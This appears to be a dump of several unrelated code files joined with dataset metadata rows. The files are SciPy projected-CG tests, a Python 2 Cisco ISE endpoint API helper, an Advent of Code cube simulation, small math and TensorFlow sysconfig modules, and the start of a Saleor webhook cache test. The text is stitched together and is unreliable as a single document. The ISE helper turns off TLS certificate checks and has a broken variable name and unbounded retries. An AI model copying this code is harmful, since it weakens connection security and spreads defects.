        # feasible point -Y.dot(b); the solver must return that point.
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        trust_radius = 2.32379000772445021283
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               trust_radius=trust_radius)
        assert_equal(info["stop_cond"], 2)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(np.linalg.norm(x), trust_radius)
        assert_array_almost_equal(x, -Y.dot(b))

    def test_hits_boundary(self):
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        trust_radius = 3
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               trust_radius=trust_radius)
        assert_equal(info["stop_cond"], 2)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(np.linalg.norm(x), trust_radius)

    def test_negative_curvature_unconstrained(self):
        # Indefinite H with no trust region: the problem is unbounded
        # below and the solver must raise.
        H = csc_matrix([[1, 2, 1, 3],
                        [2, 0, 2, 4],
                        [1, 2, 0, 2],
                        [3, 4, 2, 0]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 0, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        with pytest.raises(ValueError):
            projected_cg(H, c, Z, Y, b, tol=0)

    def test_negative_curvature(self):
        # Same indefinite H, but with a trust region the solver follows the
        # negative-curvature direction to the boundary.
        H = csc_matrix([[1, 2, 1, 3],
                        [2, 0, 2, 4],
                        [1, 2, 0, 2],
                        [3, 4, 2, 0]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 0, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        trust_radius = 1000
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               trust_radius=trust_radius)
        assert_equal(info["stop_cond"], 3)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(np.linalg.norm(x), trust_radius)

    # The box constraints are inactive at the solution but
    # are active during the iterations.
    def test_inactive_box_constraints(self):
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               lb=[0.5, -np.inf,
                                   -np.inf, -np.inf],
                               return_all=True)
        x_kkt, _ = eqp_kktfact(H, c, A, b)
        assert_equal(info["stop_cond"], 1)
        assert_equal(info["hits_boundary"], False)
        assert_array_almost_equal(x, x_kkt)

    # The box constraints active and the termination is
    # by maximum iterations (infeasible iteraction).
    # NOTE(review): the name says "maximum iterations" but stop_cond 1 is
    # asserted below -- confirm against the solver's stop-condition codes.
    def test_active_box_constraints_maximum_iterations_reached(self):
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               lb=[0.8, -np.inf,
                                   -np.inf, -np.inf],
                               return_all=True)
        assert_equal(info["stop_cond"], 1)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(A.dot(x), -b)
        assert_array_almost_equal(x[0], 0.8)

    # The box constraints are active and the termination is
    # because it hits boundary (without infeasible iteraction).
    def test_active_box_constraints_hits_boundaries(self):
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        trust_radius = 3
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               ub=[np.inf, np.inf, 1.6, np.inf],
                               trust_radius=trust_radius,
                               return_all=True)
        assert_equal(info["stop_cond"], 2)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(x[2], 1.6)

    # The box constraints are active and the termination is
    # because it hits boundary (infeasible iteraction).
    def test_active_box_constraints_hits_boundaries_infeasible_iter(self):
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        trust_radius = 4
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               ub=[np.inf, 0.1, np.inf, np.inf],
                               trust_radius=trust_radius,
                               return_all=True)
        assert_equal(info["stop_cond"], 2)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(x[1], 0.1)

    # The box constraints are active and the termination is
    # because it hits boundary (no infeasible iteraction).
    def test_active_box_constraints_negative_curvature(self):
        H = csc_matrix([[1, 2, 1, 3],
                        [2, 0, 2, 4],
                        [1, 2, 0, 2],
                        [3, 4, 2, 0]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 0, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        trust_radius = 1000
        x, info = projected_cg(H, c, Z, Y, b,
                               tol=0,
                               ub=[np.inf, np.inf, 100, np.inf],
                               trust_radius=trust_radius)
        assert_equal(info["stop_cond"], 3)
        assert_equal(info["hits_boundary"], True)
        assert_array_almost_equal(x[2], 100)
| 42.970769
| 79
| 0.450789
| 3,266
| 27,931
| 3.674525
| 0.060318
| 0.026998
| 0.08216
| 0.106324
| 0.888509
| 0.865845
| 0.852679
| 0.831014
| 0.813099
| 0.789601
| 0
| 0.06955
| 0.422935
| 27,931
| 649
| 80
| 43.03698
| 0.675022
| 0.085675
| 0
| 0.761341
| 0
| 0
| 0.008637
| 0
| 0
| 0
| 0
| 0
| 0.258383
| 1
| 0.045365
| false
| 0
| 0.011834
| 0
| 0.069034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
533d270e590d1aae1670c3ce49ad1e7f00286ca6
| 12,189
|
py
|
Python
|
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | 1
|
2020-05-05T15:39:01.000Z
|
2020-05-05T15:39:01.000Z
|
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | null | null | null |
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | 1
|
2020-06-28T09:41:46.000Z
|
2020-06-28T09:41:46.000Z
|
import re
import requests
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def json_pretty_print(json_dict):
    """Serialize *json_dict* as indented, key-sorted JSON text."""
    return json.dumps(json_dict, sort_keys=True, indent=2)
def get_endpoint_list(creds, mac_add):
    """Return the ISE ERS JSON listing of endpoints whose MAC contains *mac_add*.

    *creds* is a dict with 'ise_server', 'ise_user' and 'ise_pass'.
    Retries (recursively) when the connection pool reports
    'Max retries exceeded'; returns None on HTTP errors or other failures.
    """
    rest_url = creds.get('ise_server') + '/ers/config/endpoint?filter=mac.CONTAINS.' + str(mac_add)
    headers = {
        'content-type': "application/json",
        'accept': "application/json",
        'cache-control': "no-cache",
    }
    try:
        r = requests.get(url=rest_url,
                         auth=(creds.get('ise_user'), creds.get('ise_pass')),
                         headers=headers, verify=False)
        r.close()
        r_json = r.json()
        if r.status_code == 200 or r.status_code == 201:
            return r_json
    except Exception as e:  # BUG FIX: `except Exception, e` is Python-2-only syntax
        # NOTE(review): the retry is unbounded -- persistent connection
        # failures recurse indefinitely; consider adding a retry cap.
        if 'Max retries exceeded' in str(e):
            time.sleep(.500)
            return get_endpoint_list(creds, mac_add)
def get_endpoint(creds, mac_add):
    """Return the ISE ERS JSON for endpoints whose MAC equals *mac_add*.

    *creds* is a dict with 'ise_server', 'ise_user' and 'ise_pass'.
    Retries (recursively) when the connection pool reports
    'Max retries exceeded'; returns None on HTTP errors or other failures.
    """
    rest_url = creds.get('ise_server') + '/ers/config/endpoint?filter=mac.EQ.' + str(mac_add)
    headers = {
        'content-type': "application/json",
        'accept': "application/json",
        'cache-control': "no-cache",
    }
    try:
        r = requests.get(url=rest_url,
                         auth=(creds.get('ise_user'), creds.get('ise_pass')),
                         headers=headers, verify=False)
        r.close()
        r_json = r.json()
        if r.status_code == 200 or r.status_code == 201:
            return r_json
    except Exception as e:  # BUG FIX: `except Exception, e` is Python-2-only syntax
        # NOTE(review): unbounded recursive retry -- consider a retry cap.
        if 'Max retries exceeded' in str(e):
            time.sleep(.500)
            return get_endpoint(creds, mac_add)
def get_endpoint_group(creds,gid):
    '''get endpoint group details'''
    # Direct fetch of a single endpoint group by its ERS id.
    rest_url = creds.get('ise_server') + '/ers/config/endpointgroup/' + str(gid)
    headers = {
        'accept': "application/json",
        'content-type': "application/json",
        'cache-control': "no-cache",
    }
    try:
        r = None
        # verify=False: self-signed ISE certs (warnings silenced at import).
        r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
        r.close()
        r_json = r.json()
        if r.status_code == 200 or r.status_code == 201:
            return r_json
    except Exception, e:
        error = e
        #print error
        # Back off and retry (unbounded) on connection-pool exhaustion.
        if 'Max retries exceeded' in str(error):
            time.sleep(.500)
            return get_endpoint_group(creds,gid)
        pass
def search_group_id(creds,gid_name):
    '''searching a group id by group name'''
    # Exact-name (EQ) filter; callers expect SearchResult.total == 1
    # when the group name resolves unambiguously.
    rest_url = creds.get('ise_server') + '/ers/config/endpointgroup?filter=name.EQ.' + str(gid_name)
    headers = {
        'accept': "application/json",
        'content-type': "application/json",
        'cache-control': "no-cache",
    }
    r = None
    try:
        # verify=False: self-signed ISE certs (warnings silenced at import).
        r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
        r.close()
        r_json = r.json()
        if r.status_code == 200 or r.status_code == 201:
            return r_json
    except Exception, e:
        error = e
        #print error
        # Back off and retry (unbounded) on connection-pool exhaustion.
        if 'Max retries exceeded' in str(error):
            time.sleep(.500)
            return search_group_id(creds,gid_name)
        pass
def get_endpoint_by_id(creds,eid):
    '''get endpoint details by its id'''
    # Direct fetch of a single endpoint record by its ERS id.
    rest_url = creds.get('ise_server') + '/ers/config/endpoint/' + str(eid)
    headers = {
        'content-type': "application/json",
        'accept': "application/json",
        'cache-control': "no-cache",
    }
    r = None
    try:
        # verify=False: self-signed ISE certs (warnings silenced at import).
        r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
        r.close()
        r_json = r.json()
        if r.status_code == 200 or r.status_code == 201:
            return r_json
    except Exception, e:
        error = e
        #print error
        # Back off and retry (unbounded) on connection-pool exhaustion.
        if 'Max retries exceeded' in str(error):
            time.sleep(.500)
            return get_endpoint_by_id(creds,eid)
        pass
def create_endpoint(creds_edit,creds_read,mac_add,role,desc):
    """Create an ISE endpoint for *mac_add*, statically assigned to the
    group named *role* (falling back to the 'Unknown' group when *role*
    does not resolve to exactly one group).

    A successful POST returns no body; when the record already exists,
    the ERS error messages are returned instead.
    """
    rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint'
    headers = {
        'content-type': "application/json",
        'accept': "application/json",
        'cache-control': "no-cache",
    }
    '''get group_id from group name'''
    gid = None
    group_json = search_group_id(creds_read,role)
    '''should only return one group object'''
    '''otherwise put it in the unknown group'''
    if group_json.get('SearchResult').get('total') == 1:
        for group in group_json.get('SearchResult').get('resources'):
            gid = group.get('id')
    else:
        group_json = search_group_id(creds_read,'Unknown')
        for group in group_json.get('SearchResult').get('resources'):
            gid = group.get('id')
    '''construct object payload to submit'''
    payload = {
        "ERSEndPoint" : {
            "id" : "",
            "name" : mac_add,
            "description" : desc,
            "mac" : mac_add,
            "staticProfileAssignment" : False,
            "groupId" : gid,
            "staticGroupAssignment" : True,
        }
    }
    # Debug dump of the outgoing payload.
    print json_pretty_print(payload)
    try:
        r = None
        # verify=False: self-signed ISE certs (warnings silenced at import).
        r = requests.post(url=rest_url,
                          auth=(creds_edit.get('ise_user'), creds_edit.get('ise_pass')),
                          headers=headers,
                          data=json.dumps(payload),
                          verify=False)
        r.close()
        r_json = r.json()
    except Exception, e:
        error = e
        #print error
        # Back off and retry (unbounded) on connection-pool exhaustion.
        if 'Max retries exceeded' in str(error):
            time.sleep(.500)
            return create_endpoint(creds_edit,creds_read,mac_add,role,desc)
        pass
    '''successful submit returns nothing'''
    '''this one is to handle records arealy present'''
    # A successful POST has no JSON body, so r.json() raises above and
    # r_json stays unset; this guard only fires on an ERS error response.
    try:
        if r_json:
            return r_json.get('ERSResponse').get('messages')
    except Exception, e:
        error2 = e
def search_endpoint_by_mac(creds,mac_add):
    '''Return full endpoint records for every endpoint whose MAC
    contains *mac_add*, or print a not-found message when none match.'''
    try:
        '''get potential list of matches'''
        r_json = get_endpoint_list(creds,mac_add)
    except Exception, e:
        error = e
        #print error
        pass
    r = None
    try:
        if r_json.get('SearchResult').get('total') >= 1:
            result_list = []
            # The search result only carries ids; fetch each full record.
            for endpoint in r_json.get('SearchResult').get('resources'):
                eid = None
                eid = str(endpoint.get('id'))
                if eid:
                    try:
                        '''get endpoint details'''
                        eid_json = get_endpoint_by_id(creds,eid)
                        #print json_pretty_print(eid_json)
                        result_list.append(eid_json)
                    except Exception, e:
                        error = e
                        pass
            return result_list
            #print str(result_list)
        else:
            print '\n ' + str(mac_add) + ' not found\n'
            if 'text' in r_json:
                print r_json['text']
    except Exception, e:
        error = e
        #print error
        pass
def delete_endpoint_by_mac(creds_edit,creds_read,mac_add):
    '''Delete every endpoint whose MAC exactly matches *mac_add*.

    Reads with *creds_read*, deletes with *creds_edit*; prints progress
    to stdout rather than returning a value.'''
    headers = {
        'content-type': "application/json",
        'accept': "application/json",
        'cache-control': "no-cache",
    }
    try:
        '''get potential matche'''
        endpoint_json = get_endpoint(creds_read,mac_add)
    except Exception, e:
        error = e
        #print error
        pass
    if endpoint_json.get('SearchResult').get('total') >= 1:
        for endpoint in endpoint_json.get('SearchResult').get('resources'):
            eid = None
            eid = str(endpoint.get('id'))
            if eid:
                try:
                    r = None
                    rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint/' + str(eid)
                    # verify=False: self-signed ISE certs.
                    r = requests.delete(url=rest_url,auth=(creds_edit.get('ise_user'), creds_edit.get('ise_pass')),headers=headers, verify=False)
                    r.close()
                    r_json = r.json()
                except Exception, e:
                    error = e
                    # Back off and restart the whole delete on pool exhaustion.
                    if 'Max retries exceeded' in str(error):
                        time.sleep(.500)
                        return delete_endpoint_by_mac(creds_edit,creds_read,mac_add)
                    pass
                print str(mac_add) + ' marked for deletion.\n'
                #return str(mac_add) + ' marked for deletion.\n'
    else:
        print '\n ' + str(mac_add) + ' not found\n'
        if 'text' in endpoint_json:
            print endpoint_json['text']
    #else:
    #    r.raise_for_status()
def update_endpoint(creds_edit,creds_read,mac_add,role,desc):
'''get group_id from group name'''
gid = None
group_json = search_group_id(creds_read,role)
'''should only return one group object'''
'''otherwise put it in the unknown group'''
if group_json.get('SearchResult').get('total') == 1:
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
else:
group_json = search_group_id(creds_read,'Unknown')
for group in group_json.get('SearchResult').get('resources'):
gid = group.get('id')
''' '''
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
try:
'''get potential match'''
endpoint_json = get_endpoint(creds_read,mac_add)
except Exception, e:
error = e
#print error
pass
if endpoint_json.get('SearchResult').get('total') >= 1:
for endpoint in endpoint_json.get('SearchResult').get('resources'):
eid = None
eid = str(endpoint.get('id'))
if eid:
payload = {
"ERSEndPoint" : {
#"name" : mac_add,
"description" : desc,
#"mac" : mac_add,
"staticProfileAssignment" : False,
"groupId" : gid,
"staticGroupAssignment" : True,
}
}
try:
r = None
rest_url = creds_edit.get('ise_server') + '/ers/config/endpoint/' + str(eid)
r = requests.put(url=rest_url,
auth=(creds_edit.get('ise_user'),
creds_edit.get('ise_pass')),
headers=headers,
data=json.dumps(payload),
verify=False)
r.close()
r_json = r.json()
except Exception, e:
error = e
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return update_endpoint(creds_edit_creds_read,mac_add,role,desc)
pass
to_update = None
to_update = get_endpoint_by_id(creds_read,eid)
return to_update
else:
print '\n ' + str(mac_add) + ' not found\n'
if 'text' in endpoint_json:
print endpoint_json['text']
| 33.122283
| 149
| 0.521618
| 1,373
| 12,189
| 4.464676
| 0.108521
| 0.023654
| 0.028711
| 0.044535
| 0.842904
| 0.828874
| 0.796085
| 0.777814
| 0.770962
| 0.749266
| 0
| 0.008582
| 0.359504
| 12,189
| 367
| 150
| 33.212534
| 0.776611
| 0.035196
| 0
| 0.742754
| 0
| 0
| 0.153371
| 0.026713
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.083333
| 0.018116
| null | null | 0.032609
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
7258f9ffed1416cf999c4df96fe44fee81e9f7fb
| 3,773
|
py
|
Python
|
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | 1
|
2020-12-04T20:15:57.000Z
|
2020-12-04T20:15:57.000Z
|
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | null | null | null |
2020/day17/day17.py
|
Cece78/advent-of-code
|
f6883ba2fe847dbaa5f8fea77962e0ef0c3dda1c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 21 10:20:55 2020
@author: celine.gross
"""
# Read the puzzle input as a 2D grid of characters ('#' marks an active cube).
with open('input_day17.txt', 'r') as file:
    puzzle = [[l for l in line.strip()] for line in file]
# Part 1
def create_positions(data):
    """Return the set of (x, y, z) coordinates that start active ('#')."""
    return {
        (row_idx, col_idx, 0)
        for row_idx, row in enumerate(data)
        for col_idx, cell in enumerate(row)
        if cell == '#'
    }
def count_neighbours(position, active):
    """Count how many of the 26 cells adjacent to *position* are active."""
    x, y, z = position
    total = 0
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            for dz in (-1, 0, 1):
                if (dx, dy, dz) == (0, 0, 0):
                    continue  # a cell is not its own neighbour
                if (x + dx, y + dy, z + dz) in active:
                    total += 1
    return total
def generate_cubes(active):
    """Return every cell in the bounding box of *active*, padded by 1 on each axis."""
    xs = [p[0] for p in active]
    ys = [p[1] for p in active]
    zs = [p[2] for p in active]
    return {
        (x, y, z)
        for x in range(min(xs) - 1, max(xs) + 2)
        for y in range(min(ys) - 1, max(ys) + 2)
        for z in range(min(zs) - 1, max(zs) + 2)
    }
def update_state(active):
    """Apply one Conway-cubes step and return the new active set."""
    next_active = active.copy()
    for cell in generate_cubes(active):
        live = count_neighbours(cell, active)
        if cell in active:
            # An active cube survives only with 2 or 3 active neighbours.
            if live < 2 or live > 3:
                next_active.remove(cell)
        elif live == 3:
            # An inactive cube activates with exactly 3 active neighbours.
            next_active.add(cell)
    return next_active
def run(data, n):
    """Boot from grid *data*, run *n* cycles, and return the active-cube count."""
    state = create_positions(data)
    for _ in range(n):
        state = update_state(state)
    return len(state)
print("Part 1: ", run(puzzle, 6))
# Part 2
def create_positions(data):
    """Return the set of (x, y, z, w) coordinates that start active ('#')."""
    return {
        (row_idx, col_idx, 0, 0)
        for row_idx, row in enumerate(data)
        for col_idx, cell in enumerate(row)
        if cell == '#'
    }
def count_neighbours(position, active):
    """Count how many of the 80 cells adjacent to *position* are active (4D)."""
    x, y, z, w = position
    total = 0
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            for dz in (-1, 0, 1):
                for dw in (-1, 0, 1):
                    if (dx, dy, dz, dw) == (0, 0, 0, 0):
                        continue  # a cell is not its own neighbour
                    if (x + dx, y + dy, z + dz, w + dw) in active:
                        total += 1
    return total
def generate_cubes(active):
    """Return every 4D cell in the bounding box of *active*, padded by 1 per axis."""
    xs = [p[0] for p in active]
    ys = [p[1] for p in active]
    zs = [p[2] for p in active]
    ws = [p[3] for p in active]
    return {
        (x, y, z, w)
        for x in range(min(xs) - 1, max(xs) + 2)
        for y in range(min(ys) - 1, max(ys) + 2)
        for z in range(min(zs) - 1, max(zs) + 2)
        for w in range(min(ws) - 1, max(ws) + 2)
    }
def update_state(active):
    """Apply one 4D Conway-cubes step and return the new active set."""
    next_active = active.copy()
    for cell in generate_cubes(active):
        live = count_neighbours(cell, active)
        if cell in active:
            # An active cube survives only with 2 or 3 active neighbours.
            if live < 2 or live > 3:
                next_active.remove(cell)
        elif live == 3:
            # An inactive cube activates with exactly 3 active neighbours.
            next_active.add(cell)
    return next_active
def run(data, n):
    """Boot from grid *data*, run *n* 4D cycles, and return the active-cube count."""
    state = create_positions(data)
    for _ in range(n):
        state = update_state(state)
    return len(state)
print("Part 2: ", run(puzzle, 6))
| 29.023077
| 93
| 0.54996
| 605
| 3,773
| 3.322314
| 0.128926
| 0.062687
| 0.104478
| 0.111443
| 0.904975
| 0.899502
| 0.871144
| 0.852239
| 0.852239
| 0.852239
| 0
| 0.034655
| 0.311688
| 3,773
| 130
| 94
| 29.023077
| 0.739315
| 0.040021
| 0
| 0.831461
| 0
| 0
| 0.009421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11236
| false
| 0
| 0
| 0
| 0.224719
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f405284bf1626dbadf7e827f5f33c9743650435e
| 62
|
py
|
Python
|
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
math.py
|
jonathanmusila/StackOverflowLite
|
7e7ca0f5746247afe7d726bdc0326ce2b0e26958
|
[
"MIT"
] | null | null | null |
def add(x, y):
    """Return the sum of *x* and *y*."""
    result = x + y
    return result
def sub(x, y):
    """Return *x* minus *y*."""
    result = x - y
    return result
| 8.857143
| 14
| 0.516129
| 14
| 62
| 2.285714
| 0.428571
| 0.25
| 0.5
| 0.5625
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.322581
| 62
| 6
| 15
| 10.333333
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
f426c3eff4c453f9490018934c5b311c447d70fb
| 646
|
py
|
Python
|
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | 2
|
2020-09-30T00:11:09.000Z
|
2021-10-04T13:00:38.000Z
|
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/tensorflow_core/_api/v2/sysconfig/__init__.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | 1
|
2020-06-28T11:47:47.000Z
|
2020-06-28T11:47:47.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""System configuration library.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.versions import CXX11_ABI_FLAG
from tensorflow.python.framework.versions import MONOLITHIC_BUILD
from tensorflow.python.platform.sysconfig import get_compile_flags
from tensorflow.python.platform.sysconfig import get_include
from tensorflow.python.platform.sysconfig import get_lib
from tensorflow.python.platform.sysconfig import get_link_flags
del _print_function
| 35.888889
| 82
| 0.852941
| 89
| 646
| 5.955056
| 0.483146
| 0.211321
| 0.226415
| 0.211321
| 0.509434
| 0.509434
| 0.34717
| 0
| 0
| 0
| 0
| 0.003401
| 0.089783
| 646
| 17
| 83
| 38
| 0.897959
| 0.241486
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.888889
| 0
| 0.888889
| 0.222222
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f434e1a83d6c75da6e7829b38b97f0295ae935be
| 11,610
|
py
|
Python
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 1,392
|
2021-10-06T15:54:28.000Z
|
2022-03-31T20:50:55.000Z
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 888
|
2021-10-06T10:48:54.000Z
|
2022-03-31T11:00:30.000Z
|
saleor/plugins/webhook/tests/test_shippping_exclude_cache.py
|
siyoola/saleor
|
4e52b8655a5570a8ce0a3b1484b4d8b46fbd0ad0
|
[
"CC-BY-4.0"
] | 538
|
2021-10-07T16:21:27.000Z
|
2022-03-31T22:58:57.000Z
|
import json
from unittest import mock
import graphene
from ...base_plugin import ExcludedShippingMethod
from ..const import CACHE_EXCLUDED_SHIPPING_KEY, CACHE_EXCLUDED_SHIPPING_TIME
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_use_cache(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    order_with_lines,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """When the cached payload equals the freshly generated payload, the
    plugin serves the exclusions from cache: no sync webhook is sent and
    the cache entry is not rewritten."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Cache hit: stored payload is identical to the generated payload.
    mocked_cache_get.return_value = (payload, [{"id": "1", "reason": webhook_reason}])
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_order(
        order=order_with_lines,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert not mocked_webhook.called
    assert not mocked_cache_set.called
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
